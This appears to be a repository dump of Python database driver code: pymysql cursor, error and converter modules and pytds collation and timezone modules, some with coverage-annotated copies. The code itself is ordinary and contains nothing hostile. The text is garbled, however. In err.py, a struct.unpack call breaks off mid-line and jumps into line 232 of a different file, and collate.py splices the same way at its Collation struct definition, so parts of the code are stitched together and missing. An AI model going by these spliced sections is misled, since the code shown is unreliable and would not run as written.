FIELD_TYPE.LONG: int, 312 | FIELD_TYPE.FLOAT: float, 313 | FIELD_TYPE.DOUBLE: float, 314 | FIELD_TYPE.DECIMAL: float, 315 | FIELD_TYPE.NEWDECIMAL: float, 316 | FIELD_TYPE.LONGLONG: int, 317 | FIELD_TYPE.INT24: int, 318 | FIELD_TYPE.YEAR: int, 319 | FIELD_TYPE.TIMESTAMP: convert_mysql_timestamp, 320 | FIELD_TYPE.DATETIME: convert_datetime, 321 | FIELD_TYPE.TIME: convert_timedelta, 322 | FIELD_TYPE.DATE: convert_date, 323 | FIELD_TYPE.SET: convert_set, 324 | FIELD_TYPE.BLOB: through, 325 | FIELD_TYPE.TINY_BLOB: through, 326 | FIELD_TYPE.MEDIUM_BLOB: through, 327 | FIELD_TYPE.LONG_BLOB: through, 328 | FIELD_TYPE.STRING: through, 329 | FIELD_TYPE.VAR_STRING: through, 330 | FIELD_TYPE.VARCHAR: through, 331 | FIELD_TYPE.DECIMAL: Decimal, 332 | FIELD_TYPE.NEWDECIMAL: Decimal, 333 | } 334 | 335 | 336 | # for MySQLdb compatibility 337 | conversions = decoders 338 | 339 | def 
Thing2Literal(obj): 340 | return escape_str(str(obj)) 341 | -------------------------------------------------------------------------------- /databases/pymysql/cursors.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from __future__ import print_function, absolute_import 3 | import re 4 | 5 | from _compat import range_type, text_type, PY2 6 | 7 | from err import ( 8 | Warning, Error, InterfaceError, DataError, 9 | DatabaseError, OperationalError, IntegrityError, InternalError, 10 | NotSupportedError, ProgrammingError) 11 | 12 | 13 | #: Regular expression for :meth:`Cursor.executemany`. 14 | #: executemany only suports simple bulk insert. 15 | #: You can use it to load large dataset. 16 | RE_INSERT_VALUES = re.compile(r"""INSERT\s.+\sVALUES\s+(\(\s*%s\s*(,\s*%s\s*)*\))\s*\Z""", 17 | re.IGNORECASE | re.DOTALL) 18 | 19 | 20 | class Cursor(object): 21 | ''' 22 | This is the object you use to interact with the database. 23 | ''' 24 | 25 | #: Max stetement size which :meth:`executemany` generates. 26 | #: 27 | #: Max size of allowed statement is max_allowed_packet - packet_header_size. 28 | #: Default value of max_allowed_packet is 1048576. 29 | max_stmt_length = 1024000 30 | 31 | def __init__(self, connection): 32 | ''' 33 | Do not create an instance of a Cursor yourself. Call 34 | connections.Connection.cursor(). 35 | ''' 36 | self.connection = connection 37 | self.description = None 38 | self.rownumber = 0 39 | self.rowcount = -1 40 | self.arraysize = 1 41 | self._executed = None 42 | self._result = None 43 | self._rows = None 44 | 45 | def __del__(self): 46 | ''' 47 | When this gets GC'd close it. 48 | ''' 49 | self.close() 50 | 51 | def close(self): 52 | ''' 53 | Closing a cursor just exhausts all remaining data. 54 | ''' 55 | conn = self.connection 56 | if conn is None: 57 | return 58 | try: 59 | while self.nextset(): 60 | pass 61 | finally: 62 | self.connection = None 63 | 64 | def _get_db(self): 65 | if not self.connection: 66 | raise ProgrammingError("Cursor closed") 67 | return self.connection 68 | 69 | def _check_executed(self): 70 | if not self._executed: 71 | raise ProgrammingError("execute() first") 72 | 73 | def _conv_row(self, row): 74 | return row 75 | 76 | def setinputsizes(self, *args): 77 | """Does nothing, required by DB API.""" 78 | 79 | def setoutputsizes(self, *args): 80 | """Does nothing, required by DB API.""" 81 | 82 | def _nextset(self, unbuffered=False): 83 | """Get the next query set""" 84 | conn = self._get_db() 85 | current_result = self._result 86 | if current_result is None or current_result is not conn._result: 87 | return None 88 | if not current_result.has_next: 89 | return None 90 | conn.next_result(unbuffered=unbuffered) 91 | self._do_get_result() 92 | return True 93 | 94 | def nextset(self): 95 | return self._nextset(False) 96 | 97 | def _escape_args(self, args, conn): 98 | if isinstance(args, (tuple, list)): 99 | return tuple(conn.escape(arg) for arg in args) 100 | elif isinstance(args, dict): 101 | return dict((key, conn.escape(val)) for (key, val) in args.items()) 102 | else: 103 | #If it's not a dictionary let's try escaping it anyways. 
104 | #Worst case it will throw a Value error 105 | return conn.escape(args) 106 | 107 | def execute(self, query, args=None): 108 | '''Execute a query''' 109 | conn = self._get_db() 110 | 111 | while self.nextset(): 112 | pass 113 | 114 | if PY2: # Use bytes on Python 2 always 115 | encoding = conn.encoding 116 | 117 | def ensure_bytes(x): 118 | if isinstance(x, unicode): 119 | x = x.encode(encoding) 120 | return x 121 | 122 | query = ensure_bytes(query) 123 | 124 | if args is not None: 125 | if isinstance(args, (tuple, list)): 126 | args = tuple(map(ensure_bytes, args)) 127 | elif isinstance(args, dict): 128 | args = dict((ensure_bytes(key), ensure_bytes(val)) for (key, val) in args.items()) 129 | else: 130 | args = ensure_bytes(args) 131 | 132 | if args is not None: 133 | query = query % self._escape_args(args, conn) 134 | 135 | result = self._query(query) 136 | self._executed = query 137 | return result 138 | 139 | def executemany(self, query, args): 140 | """Run several data against one query 141 | 142 | PyMySQL can execute bulkinsert for query like 'INSERT ... VALUES (%s)'. 143 | In other form of queries, just run :meth:`execute` many times. 144 | """ 145 | if not args: 146 | return 147 | 148 | m = RE_INSERT_VALUES.match(query) 149 | if m: 150 | q_values = m.group(1).rstrip() 151 | assert q_values[0] == '(' and q_values[-1] == ')' 152 | q_prefix = query[:m.start(1)] 153 | return self._do_execute_many(q_prefix, q_values, args, 154 | self.max_stmt_length, 155 | self._get_db().encoding) 156 | 157 | self.rowcount = sum(self.execute(query, arg) for arg in args) 158 | return self.rowcount 159 | 160 | def _do_execute_many(self, prefix, values, args, max_stmt_length, encoding): 161 | conn = self._get_db() 162 | escape = self._escape_args 163 | if isinstance(prefix, text_type): 164 | prefix = prefix.encode(encoding) 165 | sql = bytearray(prefix) 166 | args = iter(args) 167 | v = values % escape(next(args), conn) 168 | if isinstance(v, text_type): 169 | v = v.encode(encoding) 170 | sql += v 171 | rows = 0 172 | for arg in args: 173 | v = values % escape(arg, conn) 174 | if isinstance(v, text_type): 175 | v = v.encode(encoding) 176 | if len(sql) + len(v) + 1 > max_stmt_length: 177 | rows += self.execute(sql) 178 | sql = bytearray(prefix) 179 | else: 180 | sql += b',' 181 | sql += v 182 | rows += self.execute(sql) 183 | self.rowcount = rows 184 | return rows 185 | 186 | def callproc(self, procname, args=()): 187 | """Execute stored procedure procname with args 188 | 189 | procname -- string, name of procedure to execute on server 190 | 191 | args -- Sequence of parameters to use with procedure 192 | 193 | Returns the original args. 194 | 195 | Compatibility warning: PEP-249 specifies that any modified 196 | parameters must be returned. This is currently impossible 197 | as they are only available by storing them in a server 198 | variable and then retrieved by a query. Since stored 199 | procedures return zero or more result sets, there is no 200 | reliable way to get at OUT or INOUT parameters via callproc. 201 | The server variables are named @_procname_n, where procname 202 | is the parameter above and n is the position of the parameter 203 | (from zero). Once all result sets generated by the procedure 204 | have been fetched, you can issue a SELECT @_procname_0, ... 205 | query using .execute() to get any OUT or INOUT values. 206 | 207 | Compatibility warning: The act of calling a stored procedure 208 | itself creates an empty result set. 
This appears after any 209 | result sets generated by the procedure. This is non-standard 210 | behavior with respect to the DB-API. Be sure to use nextset() 211 | to advance through all result sets; otherwise you may get 212 | disconnected. 213 | """ 214 | conn = self._get_db() 215 | for index, arg in enumerate(args): 216 | q = "SET @_%s_%d=%s" % (procname, index, conn.escape(arg)) 217 | self._query(q) 218 | self.nextset() 219 | 220 | q = "CALL %s(%s)" % (procname, 221 | ','.join(['@_%s_%d' % (procname, i) 222 | for i in range_type(len(args))])) 223 | self._query(q) 224 | self._executed = q 225 | return args 226 | 227 | def fetchone(self): 228 | ''' Fetch the next row ''' 229 | self._check_executed() 230 | if self._rows is None or self.rownumber >= len(self._rows): 231 | return None 232 | result = self._rows[self.rownumber] 233 | self.rownumber += 1 234 | return result 235 | 236 | def fetchmany(self, size=None): 237 | ''' Fetch several rows ''' 238 | self._check_executed() 239 | if self._rows is None: 240 | return None 241 | end = self.rownumber + (size or self.arraysize) 242 | result = self._rows[self.rownumber:end] 243 | self.rownumber = min(end, len(self._rows)) 244 | return result 245 | 246 | def fetchall(self): 247 | ''' Fetch all the rows ''' 248 | self._check_executed() 249 | if self._rows is None: 250 | return None 251 | if self.rownumber: 252 | result = self._rows[self.rownumber:] 253 | else: 254 | result = self._rows 255 | self.rownumber = len(self._rows) 256 | return result 257 | 258 | def scroll(self, value, mode='relative'): 259 | self._check_executed() 260 | if mode == 'relative': 261 | r = self.rownumber + value 262 | elif mode == 'absolute': 263 | r = value 264 | else: 265 | raise ProgrammingError("unknown scroll mode %s" % mode) 266 | 267 | if not (0 <= r < len(self._rows)): 268 | raise IndexError("out of range") 269 | self.rownumber = r 270 | 271 | def _query(self, q): 272 | conn = self._get_db() 273 | self._last_executed = q 274 | conn.query(q) 275 | self._do_get_result() 276 | return self.rowcount 277 | 278 | def _do_get_result(self): 279 | conn = self._get_db() 280 | 281 | self.rownumber = 0 282 | self._result = result = conn._result 283 | 284 | self.rowcount = result.affected_rows 285 | self.description = result.description 286 | self.lastrowid = result.insert_id 287 | self._rows = result.rows 288 | 289 | def __iter__(self): 290 | return iter(self.fetchone, None) 291 | 292 | Warning = Warning 293 | Error = Error 294 | InterfaceError = InterfaceError 295 | DatabaseError = DatabaseError 296 | DataError = DataError 297 | OperationalError = OperationalError 298 | IntegrityError = IntegrityError 299 | InternalError = InternalError 300 | ProgrammingError = ProgrammingError 301 | NotSupportedError = NotSupportedError 302 | 303 | 304 | class DictCursorMixin(object): 305 | # You can override this to use OrderedDict or other dict-like types. 306 | dict_type = dict 307 | 308 | def _do_get_result(self): 309 | super(DictCursorMixin, self)._do_get_result() 310 | fields = [] 311 | if self.description: 312 | for f in self._result.fields: 313 | name = f.name 314 | if name in fields: 315 | name = f.table_name + '.' 
+ name 316 | fields.append(name) 317 | self._fields = fields 318 | 319 | if fields and self._rows: 320 | self._rows = [self._conv_row(r) for r in self._rows] 321 | 322 | def _conv_row(self, row): 323 | if row is None: 324 | return None 325 | return self.dict_type(zip(self._fields, row)) 326 | 327 | 328 | class DictCursor(DictCursorMixin, Cursor): 329 | """A cursor which returns results as a dictionary""" 330 | 331 | 332 | class SSCursor(Cursor): 333 | """ 334 | Unbuffered Cursor, mainly useful for queries that return a lot of data, 335 | or for connections to remote servers over a slow network. 336 | 337 | Instead of copying every row of data into a buffer, this will fetch 338 | rows as needed. The upside of this, is the client uses much less memory, 339 | and rows are returned much faster when traveling over a slow network, 340 | or if the result set is very big. 341 | 342 | There are limitations, though. The MySQL protocol doesn't support 343 | returning the total number of rows, so the only way to tell how many rows 344 | there are is to iterate over every row returned. Also, it currently isn't 345 | possible to scroll backwards, as only the current row is held in memory. 346 | """ 347 | 348 | def _conv_row(self, row): 349 | return row 350 | 351 | def close(self): 352 | conn = self.connection 353 | if conn is None: 354 | return 355 | 356 | if self._result is not None and self._result is conn._result: 357 | self._result._finish_unbuffered_query() 358 | 359 | try: 360 | while self.nextset(): 361 | pass 362 | finally: 363 | self.connection = None 364 | 365 | def _query(self, q): 366 | conn = self._get_db() 367 | self._last_executed = q 368 | conn.query(q, unbuffered=True) 369 | self._do_get_result() 370 | return self.rowcount 371 | 372 | def nextset(self): 373 | return self._nextset(unbuffered=True) 374 | 375 | def read_next(self): 376 | """ Read next row """ 377 | return self._conv_row(self._result._read_rowdata_packet_unbuffered()) 378 | 379 | def fetchone(self): 380 | """ Fetch next row """ 381 | self._check_executed() 382 | row = self.read_next() 383 | if row is None: 384 | return None 385 | self.rownumber += 1 386 | return row 387 | 388 | def fetchall(self): 389 | """ 390 | Fetch all, as per MySQLdb. Pretty useless for large queries, as 391 | it is buffered. See fetchall_unbuffered(), if you want an unbuffered 392 | generator version of this method. 393 | 394 | """ 395 | return list(self.fetchall_unbuffered()) 396 | 397 | def fetchall_unbuffered(self): 398 | """ 399 | Fetch all, implemented as a generator, which isn't to standard, 400 | however, it doesn't make sense to return everything in a list, as that 401 | would use ridiculous memory for large result sets. 
402 | """ 403 | return iter(self.fetchone, None) 404 | 405 | def __iter__(self): 406 | return self.fetchall_unbuffered() 407 | 408 | def fetchmany(self, size=None): 409 | """ Fetch many """ 410 | 411 | self._check_executed() 412 | if size is None: 413 | size = self.arraysize 414 | 415 | rows = [] 416 | for i in range_type(size): 417 | row = self.read_next() 418 | if row is None: 419 | break 420 | rows.append(row) 421 | self.rownumber += 1 422 | return rows 423 | 424 | def scroll(self, value, mode='relative'): 425 | self._check_executed() 426 | 427 | if mode == 'relative': 428 | if value < 0: 429 | raise NotSupportedError( 430 | "Backwards scrolling not supported by this cursor") 431 | 432 | for _ in range_type(value): 433 | self.read_next() 434 | self.rownumber += value 435 | elif mode == 'absolute': 436 | if value < self.rownumber: 437 | raise NotSupportedError( 438 | "Backwards scrolling not supported by this cursor") 439 | 440 | end = value - self.rownumber 441 | for _ in range_type(end): 442 | self.read_next() 443 | self.rownumber = value 444 | else: 445 | raise ProgrammingError("unknown scroll mode %s" % mode) 446 | 447 | 448 | class SSDictCursor(DictCursorMixin, SSCursor): 449 | """ An unbuffered cursor, which returns results as a dictionary """ 450 | -------------------------------------------------------------------------------- /databases/pymysql/err.py: -------------------------------------------------------------------------------- 1 | import struct 2 | 3 | from constants import ER 4 | 5 | class MySQLError(Exception): 6 | """Exception related to operation with MySQL.""" 7 | 8 | 9 | class Warning(Warning, MySQLError): 10 | """Exception raised for important warnings like data truncations 11 | while inserting, etc.""" 12 | 13 | class Error(MySQLError): 14 | """Exception that is the base class of all other error exceptions 15 | (not Warning).""" 16 | 17 | 18 | class InterfaceError(Error): 19 | """Exception raised for errors that are related to the database 20 | interface rather than the database itself.""" 21 | 22 | 23 | class DatabaseError(Error): 24 | """Exception raised for errors that are related to the 25 | database.""" 26 | 27 | 28 | class DataError(DatabaseError): 29 | """Exception raised for errors that are due to problems with the 30 | processed data like division by zero, numeric value out of range, 31 | etc.""" 32 | 33 | 34 | class OperationalError(DatabaseError): 35 | """Exception raised for errors that are related to the database's 36 | operation and not necessarily under the control of the programmer, 37 | e.g. an unexpected disconnect occurs, the data source name is not 38 | found, a transaction could not be processed, a memory allocation 39 | error occurred during processing, etc.""" 40 | 41 | 42 | class IntegrityError(DatabaseError): 43 | """Exception raised when the relational integrity of the database 44 | is affected, e.g. a foreign key check fails, duplicate key, 45 | etc.""" 46 | 47 | 48 | class InternalError(DatabaseError): 49 | """Exception raised when the database encounters an internal 50 | error, e.g. the cursor is not valid anymore, the transaction is 51 | out of sync, etc.""" 52 | 53 | 54 | class ProgrammingError(DatabaseError): 55 | """Exception raised for programming errors, e.g. 
table not found 56 | or already exists, syntax error in the SQL statement, wrong number 57 | of parameters specified, etc.""" 58 | 59 | 60 | class NotSupportedError(DatabaseError): 61 | """Exception raised in case a method or database API was used 62 | which is not supported by the database, e.g. requesting a 63 | .rollback() on a connection that does not support transaction or 64 | has transactions turned off.""" 65 | 66 | 67 | error_map = {} 68 | 69 | def _map_error(exc, *errors): 70 | for error in errors: 71 | error_map[error] = exc 72 | 73 | _map_error(ProgrammingError, ER.DB_CREATE_EXISTS, ER.SYNTAX_ERROR, 74 | ER.PARSE_ERROR, ER.NO_SUCH_TABLE, ER.WRONG_DB_NAME, 75 | ER.WRONG_TABLE_NAME, ER.FIELD_SPECIFIED_TWICE, 76 | ER.INVALID_GROUP_FUNC_USE, ER.UNSUPPORTED_EXTENSION, 77 | ER.TABLE_MUST_HAVE_COLUMNS, ER.CANT_DO_THIS_DURING_AN_TRANSACTION) 78 | _map_error(DataError, ER.WARN_DATA_TRUNCATED, ER.WARN_NULL_TO_NOTNULL, 79 | ER.WARN_DATA_OUT_OF_RANGE, ER.NO_DEFAULT, ER.PRIMARY_CANT_HAVE_NULL, 80 | ER.DATA_TOO_LONG, ER.DATETIME_FUNCTION_OVERFLOW) 81 | _map_error(IntegrityError, ER.DUP_ENTRY, ER.NO_REFERENCED_ROW, 82 | ER.NO_REFERENCED_ROW_2, ER.ROW_IS_REFERENCED, ER.ROW_IS_REFERENCED_2, 83 | ER.CANNOT_ADD_FOREIGN, ER.BAD_NULL_ERROR) 84 | _map_error(NotSupportedError, ER.WARNING_NOT_COMPLETE_ROLLBACK, 85 | ER.NOT_SUPPORTED_YET, ER.FEATURE_DISABLED, ER.UNKNOWN_STORAGE_ENGINE) 86 | _map_error(OperationalError, ER.DBACCESS_DENIED_ERROR, ER.ACCESS_DENIED_ERROR, 87 | ER.CON_COUNT_ERROR, ER.TABLEACCESS_DENIED_ERROR, 88 | ER.COLUMNACCESS_DENIED_ERROR) 89 | 90 | del _map_error, ER 91 | 92 | 93 | def _get_error_info(data): 94 | errno = struct.unpack('> 26 232 | return cls(lcid=lcid, 233 | ignore_case=ignore_case, 234 | ignore_accent=ignore_accent, 235 | ignore_width=ignore_width, 236 | ignore_kana=ignore_kana, 237 | binary=binary, 238 | binary2=binary2, 239 | version=version, 240 | sort_id=sort_id) 241 | 242 | 1: def pack(self): 243 | lump = 0 244 | lump |= self.lcid & 0xfffff 245 | lump |= (self.version << 26) & 0xf0000000 246 | if self.ignore_case: 247 | lump |= self.f_ignore_case 248 | if self.ignore_accent: 249 | lump |= self.f_ignore_accent 250 | if self.ignore_width: 251 | lump |= self.f_ignore_width 252 | if self.ignore_kana: 253 | lump |= self.f_ignore_kana 254 | if self.binary: 255 | lump |= self.f_binary 256 | if self.binary2: 257 | lump |= self.f_binary2 258 | return self._coll_struct.pack(lump, self.sort_id) 259 | 260 | 1: def get_charset(self): 261 | if self.sort_id: 262 | return sortid2charset(self.sort_id) 263 | else: 264 | return lcid2charset(self.lcid) 265 | 266 | 1: def get_codec(self): 267 | return codecs.lookup(self.get_charset()) 268 | 269 | #TODO: define __repr__ and __unicode__ 270 | 271 | 272 | 1: raw_collation = Collation(0, 0, 0, 0, 0, 0, 0, 0, 0) 273 | -------------------------------------------------------------------------------- /databases/pytds/collate.py: -------------------------------------------------------------------------------- 1 | import codecs 2 | import struct 3 | 4 | TDS_CHARSET_ISO_8859_1 = 1 5 | TDS_CHARSET_CP1251 = 2 6 | TDS_CHARSET_CP1252 = 3 7 | TDS_CHARSET_UCS_2LE = 4 8 | 9 | TDS_CHARSET_UNICODE = 5 10 | 11 | ucs2_codec = codecs.lookup('utf_16_le') 12 | 13 | 14 | def sortid2charset(sort_id): 15 | sql_collate = sort_id 16 | # 17 | # The table from the MSQLServer reference "Windows Collation Designators" 18 | # and from " NLS Information for Microsoft Windows XP" 19 | # 20 | if sql_collate in ( 21 | 30, # SQL_Latin1_General_CP437_BIN 22 | 31, # 
SQL_Latin1_General_CP437_CS_AS 23 | 32, # SQL_Latin1_General_CP437_CI_AS 24 | 33, # SQL_Latin1_General_Pref_CP437_CI_AS 25 | 34): # SQL_Latin1_General_CP437_CI_AI 26 | return 'CP437' 27 | elif sql_collate in ( 28 | 40, # SQL_Latin1_General_CP850_BIN 29 | 41, # SQL_Latin1_General_CP850_CS_AS 30 | 42, # SQL_Latin1_General_CP850_CI_AS 31 | 43, # SQL_Latin1_General_Pref_CP850_CI_AS 32 | 44, # SQL_Latin1_General_CP850_CI_AI 33 | 49, # SQL_1xCompat_CP850_CI_AS 34 | 55, # SQL_AltDiction_CP850_CS_AS 35 | 56, # SQL_AltDiction_Pref_CP850_CI_AS 36 | 57, # SQL_AltDiction_CP850_CI_AI 37 | 58, # SQL_Scandinavian_Pref_CP850_CI_AS 38 | 59, # SQL_Scandinavian_CP850_CS_AS 39 | 60, # SQL_Scandinavian_CP850_CI_AS 40 | 61): # SQL_AltDiction_CP850_CI_AS 41 | return 'CP850' 42 | elif sql_collate in ( 43 | 80, # SQL_Latin1_General_1250_BIN 44 | 81, # SQL_Latin1_General_CP1250_CS_AS 45 | 82, # SQL_Latin1_General_Cp1250_CI_AS_KI_WI 46 | 83, # SQL_Czech_Cp1250_CS_AS_KI_WI 47 | 84, # SQL_Czech_Cp1250_CI_AS_KI_WI 48 | 85, # SQL_Hungarian_Cp1250_CS_AS_KI_WI 49 | 86, # SQL_Hungarian_Cp1250_CI_AS_KI_WI 50 | 87, # SQL_Polish_Cp1250_CS_AS_KI_WI 51 | 88, # SQL_Polish_Cp1250_CI_AS_KI_WI 52 | 89, # SQL_Romanian_Cp1250_CS_AS_KI_WI 53 | 90, # SQL_Romanian_Cp1250_CI_AS_KI_WI 54 | 91, # SQL_Croatian_Cp1250_CS_AS_KI_WI 55 | 92, # SQL_Croatian_Cp1250_CI_AS_KI_WI 56 | 93, # SQL_Slovak_Cp1250_CS_AS_KI_WI 57 | 94, # SQL_Slovak_Cp1250_CI_AS_KI_WI 58 | 95, # SQL_Slovenian_Cp1250_CS_AS_KI_WI 59 | 96, # SQL_Slovenian_Cp1250_CI_AS_KI_WI 60 | ): 61 | return 'CP1250' 62 | elif sql_collate in ( 63 | 104, # SQL_Latin1_General_1251_BIN 64 | 105, # SQL_Latin1_General_CP1251_CS_AS 65 | 106, # SQL_Latin1_General_CP1251_CI_AS 66 | 107, # SQL_Ukrainian_Cp1251_CS_AS_KI_WI 67 | 108, # SQL_Ukrainian_Cp1251_CI_AS_KI_WI 68 | ): 69 | return 'CP1251' 70 | elif sql_collate in ( 71 | 51, # SQL_Latin1_General_Cp1_CS_AS_KI_WI 72 | 52, # SQL_Latin1_General_Cp1_CI_AS_KI_WI 73 | 53, # SQL_Latin1_General_Pref_Cp1_CI_AS_KI_WI 74 | 54, # SQL_Latin1_General_Cp1_CI_AI_KI_WI 75 | 183, # SQL_Danish_Pref_Cp1_CI_AS_KI_WI 76 | 184, # SQL_SwedishPhone_Pref_Cp1_CI_AS_KI_WI 77 | 185, # SQL_SwedishStd_Pref_Cp1_CI_AS_KI_WI 78 | 186, # SQL_Icelandic_Pref_Cp1_CI_AS_KI_WI 79 | ): 80 | return 'CP1252' 81 | elif sql_collate in ( 82 | 112, # SQL_Latin1_General_1253_BIN 83 | 113, # SQL_Latin1_General_CP1253_CS_AS 84 | 114, # SQL_Latin1_General_CP1253_CI_AS 85 | 120, # SQL_MixDiction_CP1253_CS_AS 86 | 121, # SQL_AltDiction_CP1253_CS_AS 87 | 122, # SQL_AltDiction2_CP1253_CS_AS 88 | 124, # SQL_Latin1_General_CP1253_CI_AI 89 | ): 90 | return 'CP1253' 91 | elif sql_collate in ( 92 | 128, # SQL_Latin1_General_1254_BIN 93 | 129, # SQL_Latin1_General_Cp1254_CS_AS_KI_WI 94 | 130, # SQL_Latin1_General_Cp1254_CI_AS_KI_WI 95 | ): 96 | return 'CP1254' 97 | elif sql_collate in ( 98 | 136, # SQL_Latin1_General_1255_BIN 99 | 137, # SQL_Latin1_General_CP1255_CS_AS 100 | 138, # SQL_Latin1_General_CP1255_CI_AS 101 | ): 102 | return 'CP1255' 103 | elif sql_collate in ( 104 | 144, # SQL_Latin1_General_1256_BIN 105 | 145, # SQL_Latin1_General_CP1256_CS_AS 106 | 146, # SQL_Latin1_General_CP1256_CI_AS 107 | ): 108 | return 'CP1256' 109 | elif sql_collate in ( 110 | 152, # SQL_Latin1_General_1257_BIN 111 | 153, # SQL_Latin1_General_CP1257_CS_AS 112 | 154, # SQL_Latin1_General_CP1257_CI_AS 113 | 155, # SQL_Estonian_Cp1257_CS_AS_KI_WI 114 | 156, # SQL_Estonian_Cp1257_CI_AS_KI_WI 115 | 157, # SQL_Latvian_Cp1257_CS_AS_KI_WI 116 | 158, # SQL_Latvian_Cp1257_CI_AS_KI_WI 117 | 159, # SQL_Lithuanian_Cp1257_CS_AS_KI_WI 
118 | 160, # SQL_Lithuanian_Cp1257_CI_AS_KI_WI 119 | ): 120 | return 'CP1257' 121 | else: 122 | raise Exception("Invalid collation: 0x%X" % (sql_collate, )) 123 | 124 | 125 | def lcid2charset(lcid): 126 | if lcid in (0x405, 127 | 0x40e, # 0x1040e 128 | 0x415, 0x418, 0x41a, 0x41b, 0x41c, 0x424, 129 | #0x81a, seem wrong in XP table TODO check 130 | 0x104e): 131 | return 'CP1250' 132 | elif lcid in (0x402, 0x419, 0x422, 0x423, 0x42f, 0x43f, 133 | 0x440, 0x444, 0x450, 134 | 0x81a, # ?? 135 | 0x82c, 0x843, 0xc1a): 136 | return 'CP1251' 137 | elif lcid in (0x1007, 0x1009, 0x100a, 0x100c, 0x1407, 138 | 0x1409, 0x140a, 0x140c, 0x1809, 0x180a, 139 | 0x180c, 0x1c09, 0x1c0a, 0x2009, 0x200a, 140 | 0x2409, 0x240a, 0x2809, 0x280a, 0x2c09, 141 | 0x2c0a, 0x3009, 0x300a, 0x3409, 0x340a, 142 | 0x380a, 0x3c0a, 0x400a, 0x403, 0x406, 143 | 0x407, # 0x10407 144 | 0x409, 0x40a, 0x40b, 0x40c, 0x40f, 0x410, 145 | 0x413, 0x414, 0x416, 0x41d, 0x421, 0x42d, 146 | 0x436, 147 | 0x437, # 0x10437 148 | 0x438, 149 | #0x439, ??? Unicode only 150 | 0x43e, 0x440a, 0x441, 0x456, 0x480a, 151 | 0x4c0a, 0x500a, 0x807, 0x809, 0x80a, 152 | 0x80c, 0x810, 0x813, 0x814, 0x816, 153 | 0x81d, 0x83e, 0xc07, 0xc09, 0xc0a, 0xc0c): 154 | return 'CP1252' 155 | elif lcid == 0x408: 156 | return 'CP1253' 157 | elif lcid in (0x41f, 0x42c, 0x443): 158 | return 'CP1254' 159 | elif lcid == 0x40d: 160 | return 'CP1255' 161 | elif lcid in (0x1001, 0x1401, 0x1801, 0x1c01, 0x2001, 162 | 0x2401, 0x2801, 0x2c01, 0x3001, 0x3401, 163 | 0x3801, 0x3c01, 0x4001, 0x401, 0x420, 164 | 0x429, 0x801, 0xc01): 165 | return 'CP1256' 166 | elif lcid in (0x425, 0x426, 0x427, 167 | 0x827): # ?? 168 | return 'CP1257' 169 | elif lcid == 0x42a: 170 | return 'CP1258' 171 | elif lcid == 0x41e: 172 | return 'CP874' 173 | elif lcid == 0x411: # 0x10411 174 | return 'CP932' 175 | elif lcid in (0x1004, 176 | 0x804): # 0x20804 177 | return 'CP936' 178 | elif lcid == 0x412: # 0x10412 179 | return 'CP949' 180 | elif lcid in (0x1404, 181 | 0x404, # 0x30404 182 | 0xc04): 183 | return 'CP950' 184 | else: 185 | return 'CP1252' 186 | 187 | 188 | class Collation(object): 189 | _coll_struct = struct.Struct('> 26 232 | return cls(lcid=lcid, 233 | ignore_case=ignore_case, 234 | ignore_accent=ignore_accent, 235 | ignore_width=ignore_width, 236 | ignore_kana=ignore_kana, 237 | binary=binary, 238 | binary2=binary2, 239 | version=version, 240 | sort_id=sort_id) 241 | 242 | def pack(self): 243 | lump = 0 244 | lump |= self.lcid & 0xfffff 245 | lump |= (self.version << 26) & 0xf0000000 246 | if self.ignore_case: 247 | lump |= self.f_ignore_case 248 | if self.ignore_accent: 249 | lump |= self.f_ignore_accent 250 | if self.ignore_width: 251 | lump |= self.f_ignore_width 252 | if self.ignore_kana: 253 | lump |= self.f_ignore_kana 254 | if self.binary: 255 | lump |= self.f_binary 256 | if self.binary2: 257 | lump |= self.f_binary2 258 | return self._coll_struct.pack(lump, self.sort_id) 259 | 260 | def get_charset(self): 261 | if self.sort_id: 262 | return sortid2charset(self.sort_id) 263 | else: 264 | return lcid2charset(self.lcid) 265 | 266 | def get_codec(self): 267 | return codecs.lookup(self.get_charset()) 268 | 269 | #TODO: define __repr__ and __unicode__ 270 | 271 | 272 | raw_collation = Collation(0, 0, 0, 0, 0, 0, 0, 0, 0) 273 | -------------------------------------------------------------------------------- /databases/pytds/tz.cover: -------------------------------------------------------------------------------- 1 | 1: import time as _time 2 | 1: from datetime import tzinfo, timedelta, 
datetime 3 | 4 | 1: ZERO = timedelta(0) 5 | 1: HOUR = timedelta(hours=1) 6 | 7 | # A UTC class. 8 | 9 | 2: class UTC(tzinfo): 10 | 1: """UTC""" 11 | 12 | 1: def utcoffset(self, dt): 13 | return ZERO 14 | 15 | 1: def tzname(self, dt): 16 | return "UTC" 17 | 18 | 1: def dst(self, dt): 19 | return ZERO 20 | 21 | 1: utc = UTC() 22 | 23 | # A class building tzinfo objects for fixed-offset time zones. 24 | # Note that FixedOffset(0, "UTC") is a different way to build a 25 | # UTC tzinfo object. 26 | 27 | 2: class FixedOffsetTimezone(tzinfo): 28 | 1: """Fixed offset in minutes east from UTC.""" 29 | 30 | 1: def __init__(self, offset, name=None): 31 | self.__offset = timedelta(minutes=offset) 32 | self.__name = name 33 | 34 | 1: def utcoffset(self, dt): 35 | return self.__offset 36 | 37 | 1: def tzname(self, dt): 38 | return self.__name 39 | 40 | 1: def dst(self, dt): 41 | return ZERO 42 | 43 | 44 | 1: STDOFFSET = timedelta(seconds = -_time.timezone) 45 | 1: if _time.daylight: 46 | 1: DSTOFFSET = timedelta(seconds = -_time.altzone) 47 | else: 48 | DSTOFFSET = STDOFFSET 49 | 50 | 1: DSTDIFF = DSTOFFSET - STDOFFSET 51 | 52 | 2: class LocalTimezone(tzinfo): 53 | 54 | 1: def utcoffset(self, dt): 55 | if self._isdst(dt): 56 | return DSTOFFSET 57 | else: 58 | return STDOFFSET 59 | 60 | 1: def dst(self, dt): 61 | if self._isdst(dt): 62 | return DSTDIFF 63 | else: 64 | return ZERO 65 | 66 | 1: def tzname(self, dt): 67 | return _time.tzname[self._isdst(dt)] 68 | 69 | 1: def _isdst(self, dt): 70 | tt = (dt.year, dt.month, dt.day, 71 | dt.hour, dt.minute, dt.second, 72 | dt.weekday(), 0, 0) 73 | stamp = _time.mktime(tt) 74 | tt = _time.localtime(stamp) 75 | return tt.tm_isdst > 0 76 | 77 | 1: local = LocalTimezone() 78 | -------------------------------------------------------------------------------- /databases/pytds/tz.py: -------------------------------------------------------------------------------- 1 | import time as _time 2 | from datetime import tzinfo, timedelta, datetime 3 | 4 | ZERO = timedelta(0) 5 | HOUR = timedelta(hours=1) 6 | 7 | # A UTC class. 8 | 9 | class UTC(tzinfo): 10 | """UTC""" 11 | 12 | def 